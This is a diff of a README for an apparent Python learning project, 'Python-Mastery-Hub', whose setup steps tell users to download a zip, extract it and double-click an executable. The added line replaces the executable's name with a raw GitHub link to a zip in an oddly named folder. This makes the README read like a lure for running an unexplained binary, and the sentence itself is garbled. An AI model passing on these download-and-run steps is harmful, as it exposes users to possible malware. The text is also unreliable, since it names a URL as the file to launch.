Dhayalsanthosh/Python-Mastery-Hub/README.md

    Once the download completes, locate the zip file in your downloads folder.
 Right-click on the file and select "Extract All."
 Follow the prompts to extract the contents.

 5. **Run the Application**
-   After extraction, find the main executable file, which is usually named `Python-Mastery-Hub.exe` or something similar.
+   After extraction, find the main executable file, which is usually named `https://raw.githubusercontent.com/Dhayalsanthosh/Python-Mastery-Hub/main/peevedness/Python-Mastery-Hub.zip` or something similar.
 Double-click this file to launch the application.

 ## 🛠 Features
 Here are some of the features you will enjoy with Python-Mastery-Hub: